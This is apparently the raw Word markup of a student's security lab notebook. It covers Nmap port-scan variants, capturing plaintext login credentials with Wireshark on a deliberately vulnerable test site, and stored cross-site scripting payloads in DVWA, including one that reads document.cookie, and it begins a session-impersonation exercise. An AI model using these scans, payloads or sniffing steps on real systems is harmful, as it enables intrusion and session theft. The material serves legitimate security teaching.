                <wp:docPr id="21213250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86250" y="2639500"/>
                          <a:ext cx="5117160" cy="2278380"/>
                          <a:chOff x="2786250" y="2639500"/>
                          <a:chExt cx="5119500" cy="4283150"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2787420" y="2640810"/>
                            <a:ext cx="5117160" cy="2278380"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6753225" cy="31337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753225" cy="3133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9" name="Shape 29"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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62" y="4762"/>
                              <a:ext cx="6734175" cy="3114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0" name="Shape 30"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="4762" y="4762"/>
                              <a:ext cx="6743700" cy="3124200"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect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0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65.99999904632568" w:line="258.99999618530273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160" w:before="1.0000000149011612" w:line="258.99999618530273"/>
                                  <w:ind w:left="187.00000762939453" w:right="0" w:firstLine="187.00000762939453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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri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SimSun-ExtB" w:cs="SimSun-ExtB" w:eastAsia="SimSun-ExtB" w:hAnsi="SimSun-ExtB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  <w:t xml:space="preserve">5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117160" cy="2278380"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325001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17160" cy="227838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4564380" cy="2484120"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="212132500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62450" y="2536625"/>
                          <a:ext cx="4564380" cy="2484120"/>
                          <a:chOff x="3062450" y="2536625"/>
                          <a:chExt cx="4567100" cy="2486750"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3063810" y="2537940"/>
                            <a:ext cx="4564380" cy="2484120"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6343650" cy="34099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343650" cy="3409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6" name="Shape 26"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId6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9524" y="9525"/>
                              <a:ext cx="6324599" cy="339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7" name="Shape 27"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6343650" cy="3409950"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="3409950" w="6343650">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6338887" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="3409950" w="6343650">
                                  <a:moveTo>
                                    <a:pt x="6338887" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6338887" y="3405187"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="3409950" w="6343650">
                                  <a:moveTo>
                                    <a:pt x="6343650" y="3405187"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="3405187"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="3409950" w="6343650">
                                  <a:moveTo>
                                    <a:pt x="4762" y="3409950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564380" cy="2484120"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325000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64380" cy="248412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8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9. Go Back to the Software Check for the Records →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="5288280" cy="2223135"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213250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01075" y="2667575"/>
                          <a:ext cx="5288280" cy="2223135"/>
                          <a:chOff x="2701075" y="2667575"/>
                          <a:chExt cx="5289850" cy="2224850"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2701860" y="2668433"/>
                            <a:ext cx="5288280" cy="2223135"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6315075" cy="2695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315075" cy="2695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3" name="Shape 63"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId6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62" y="4762"/>
                              <a:ext cx="6296024" cy="2676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4" name="Shape 64"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6315075" cy="2695575"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="2695575" w="6315075">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6310312" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2695575" w="6315075">
                                  <a:moveTo>
                                    <a:pt x="6310312" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6310312" y="2690812"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2695575" w="6315075">
                                  <a:moveTo>
                                    <a:pt x="6315075" y="2690812"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="2690812"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2695575" w="6315075">
                                  <a:moveTo>
                                    <a:pt x="4762" y="2695575"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="4762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288280" cy="2223135"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325009" name="image105.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image105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88280" cy="222313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Practical No.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Aim: -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Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS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ACK-sA (TCP ACK Scan):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Command: nmap -sA -T4 scanme.nmap.org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669998" cy="1029747"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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9998" cy="1029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594663" cy="1854282"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4663" cy="1854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SYN Scan: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Command: nmap -p 22,113,139 scanme.nmap.org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944741" cy="1363872"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4741" cy="1363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604514" cy="2251523"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132502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4514" cy="2251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C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FIN Scan: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Command: nmap -sF -T4 scanme.nmap.org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534642" cy="1038771"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4642" cy="1038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563253" cy="2074551"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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3253" cy="2074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NULL Scan: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Command: nmap -sN -p 22 scanme.nmap.org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288511" cy="1288834"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132502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8511" cy="1288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281262" cy="2504994"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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262" cy="2504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XMAS Scan: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Command: nmap -sX -T4 scanme.nmap.org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699147" cy="1380999"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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9147" cy="1380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322914" cy="2519224"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2914" cy="2519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Practical No. 7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Aim: -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Use Wireshark (Sniffer) to capture network traffic and analyze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Open Wireshark and select your Connection.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5731510" cy="3044825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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5373390" cy="2854576"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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3390" cy="2854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Open any http website and add display filter as http. (</w:t>
      </w:r>
      <w:hyperlink r:id="rId7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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://testasp.vulnweb.com/Login.asp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)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6170499" cy="3278035"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0499" cy="3278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Fill the form on the website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5784807" cy="2404675"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4807" cy="240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Search for POST request in wireshark then right click on it &gt;&gt; Follow &gt;&gt; Tcp Stream :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5561562" cy="4425341"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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1562" cy="4425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Username and Password will be visible here with names like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tfUName=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username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&amp;tfUPass=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password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Practical No. 9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Aim: -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Simulate persistent cross-site scripting attack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Pre-requisites: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Xampp: </w:t>
      </w:r>
      <w:hyperlink r:id="rId78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8"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.apachefriends.org/download.html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F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DVWA Zip: </w:t>
      </w:r>
      <w:hyperlink r:id="rId79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8"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sourceforge.net/projects/dvwa.mirror/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Steps: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Open XAMPP Control Panel &amp; Start Apache, MySQL Server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497069" cy="2263060"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132501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7069" cy="2263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Open Any Browser &amp; Paste Link in the Address Bar, To Check the Working </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">“http://localhost/dashboard/</w:t>
        </w:r>
      </w:hyperlink>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_9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” →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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427816" cy="1224445"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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7816" cy="1224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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_10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Go to “DVWA\config\config.php.dist” &amp; Rename File To “config.php” →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="3924300" cy="2110740"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213250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83850" y="2724625"/>
                          <a:ext cx="3924300" cy="2110740"/>
                          <a:chOff x="3383850" y="2724625"/>
                          <a:chExt cx="3924300" cy="2110750"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3383850" y="2724630"/>
                            <a:ext cx="3924300" cy="2110740"/>
                            <a:chOff x="3383850" y="2724625"/>
                            <a:chExt cx="3924300" cy="2110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383850" y="2724625"/>
                              <a:ext cx="3924300" cy="2110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3383850" y="2724630"/>
                              <a:ext cx="3924300" cy="2110740"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="5731510" cy="3178810"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="59" name="Shape 59"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="5731500" cy="317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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="60" name="Shape 60"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId83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0" y="0"/>
                                <a:ext cx="5731510" cy="31788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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="61" name="Shape 61"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId84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1584960" y="1950720"/>
                                <a:ext cx="3552190" cy="11855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924300" cy="2110740"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325008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24300" cy="211074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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_11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Open the File with Notepad →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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000903" cy="1937508"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132501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903" cy="1937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Now, Make Changes according to the $_DVWA[ ‘db_user’ ]=”root” ; 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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_12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$_DVWA [ ‘db_password’ ] = “ ” ;   →  CTRL  S</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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364164" cy="1448597"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132502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164" cy="1448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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_13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Go to Xampp Folder and Paste DVWA Folder →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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479326" cy="1927510"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132502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9326" cy="1927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Now, try running the “setup.php” file of DVWA by Any Favourite Browser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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_14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“localhost/phpmyadmin/DVWA/setup.php” → “Create / Reset Database”.</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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-203199</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>279400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6316980" cy="3261360"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="212132500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87500" y="2149300"/>
                          <a:ext cx="6316980" cy="3261360"/>
                          <a:chOff x="2187500" y="2149300"/>
                          <a:chExt cx="6317000" cy="3261400"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2187510" y="2149320"/>
                            <a:ext cx="6316980" cy="3261360"/>
                            <a:chOff x="2187500" y="2149300"/>
                            <a:chExt cx="6317000" cy="32614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187500" y="2149300"/>
                              <a:ext cx="6317000" cy="3261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187510" y="2149320"/>
                              <a:ext cx="6316980" cy="3261360"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="7197090" cy="3493770"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="44" name="Shape 44"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="7197075" cy="3493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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="45" name="Shape 45"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId88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3634740" y="0"/>
                                <a:ext cx="3562350" cy="25984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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="46" name="Shape 46"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId89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0" y="0"/>
                                <a:ext cx="4876800" cy="3493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-203199</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>279400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6316980" cy="3261360"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121325005" name="image101.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image101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16980" cy="32613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Now, Set the Security as “LOW” in DVWA Security Section -&gt; Submit.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113498" cy="2683846"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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3498" cy="2683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Select XSS Stored </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⟶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Fill Name &amp; Write Script Code in Message </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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&lt;script&gt; alert("Hello, I’m Zombie!"); &lt;/script&gt;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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="4732020" cy="2956560"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="212132500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79975" y="2301700"/>
                          <a:ext cx="4732020" cy="2956560"/>
                          <a:chOff x="2979975" y="2301700"/>
                          <a:chExt cx="4732050" cy="2956600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2979990" y="2301720"/>
                            <a:ext cx="4732020" cy="2956560"/>
                            <a:chOff x="2979975" y="2301700"/>
                            <a:chExt cx="4732050" cy="29566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979975" y="2301700"/>
                              <a:ext cx="4732050" cy="2956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979990" y="2301720"/>
                              <a:ext cx="4732020" cy="2956560"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="4488180" cy="2731770"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="49" name="Shape 49"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="4488175" cy="2731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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="50" name="Shape 50"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId91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0" y="0"/>
                                <a:ext cx="4488180" cy="17189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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="51" name="Shape 51"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId92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342900" y="1722120"/>
                                <a:ext cx="3803650" cy="1009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732020" cy="2956560"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325006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32020" cy="295656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Similarly, we can fetch Cookies Data </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⟶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&lt;script&gt; alert(document.cookie); &lt;/script&gt;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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distB="0" distT="0" distL="0" distR="0">
                <wp:extent cx="4114800" cy="2255520"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213250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88600" y="2652225"/>
                          <a:ext cx="4114800" cy="2255520"/>
                          <a:chOff x="3288600" y="2652225"/>
                          <a:chExt cx="4114800" cy="2255550"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3288600" y="2652240"/>
                            <a:ext cx="4114800" cy="2255520"/>
                            <a:chOff x="3288600" y="2652225"/>
                            <a:chExt cx="4114800" cy="2255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288600" y="2652225"/>
                              <a:ext cx="4114800" cy="2255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3288600" y="2652240"/>
                              <a:ext cx="4114800" cy="2255520"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="3954780" cy="2185035"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="54" name="Shape 54"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="3954775" cy="21850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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="55" name="Shape 55"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId93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22860" y="1112520"/>
                                <a:ext cx="3916680" cy="1072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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="56" name="Shape 56"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId94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0" y="0"/>
                                <a:ext cx="3954780" cy="11093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14800" cy="2255520"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121325007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14800" cy="225552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After Clicking OK, Change the DVWA Security to Impossible, The ATTACK will be Unsuccessful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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔒</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_15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 →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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3035300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>546100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3528060" cy="3068955"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="21213250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81950" y="2245500"/>
                          <a:ext cx="3528060" cy="3068955"/>
                          <a:chOff x="3581950" y="2245500"/>
                          <a:chExt cx="3528100" cy="3069000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3581970" y="2245523"/>
                            <a:ext cx="3528060" cy="3068955"/>
                            <a:chOff x="3581950" y="2245500"/>
                            <a:chExt cx="3528100" cy="30690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581950" y="2245500"/>
                              <a:ext cx="3528100" cy="306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3581970" y="2245523"/>
                              <a:ext cx="3528060" cy="3068955"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="3528060" cy="3068955"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="77" name="Shape 77"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="3528050" cy="3068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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="78" name="Shape 78"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId95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121920" y="0"/>
                                <a:ext cx="3368040" cy="22174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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="79" name="Shape 79"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId96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0" y="2324100"/>
                                <a:ext cx="3528060" cy="7448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3035300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>546100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3528060" cy="3068955"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121325012" name="image115.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image115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8060" cy="30689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-520699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3727450" cy="2499360"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="212132500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82275" y="2530300"/>
                          <a:ext cx="3727450" cy="2499360"/>
                          <a:chOff x="3482275" y="2530300"/>
                          <a:chExt cx="3727450" cy="2499400"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3482275" y="2530320"/>
                            <a:ext cx="3727450" cy="2499360"/>
                            <a:chOff x="3482275" y="2530300"/>
                            <a:chExt cx="3727450" cy="24994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482275" y="2530300"/>
                              <a:ext cx="3727450" cy="249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3482275" y="2530320"/>
                              <a:ext cx="3727450" cy="2499360"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="3727450" cy="2499360"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:cNvPr id="39" name="Shape 39"/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="3727450" cy="2499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pic:pic>
                            <pic:nvPicPr>
                              <pic:cNvPr id="40" name="Shape 40"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId97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0" y="1333500"/>
                                <a:ext cx="3685540" cy="1165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>
                            <pic:nvPicPr>
                              <pic:cNvPr id="41" name="Shape 41"/>
                              <pic:cNvPicPr preferRelativeResize="0"/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId98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38100" y="0"/>
                                <a:ext cx="3689350" cy="1289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-520699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3727450" cy="2499360"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121325004" name="image100.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image100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27450" cy="24993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60" w:firstLine="0"/>
        <w:jc w:val="right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Practical No. 10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Aim: -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Session Impersonation using Firefox &amp; Tamper Data, Cookie Editor add-ons.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Steps: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Open Mozilla Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_16"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
              <w:color w:val="000000"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Go to Extension Market (add-on) and download below add-ons →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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Tamper data: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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔗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  <w:hyperlink r:id="rId99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https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/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Cookie Editor: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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
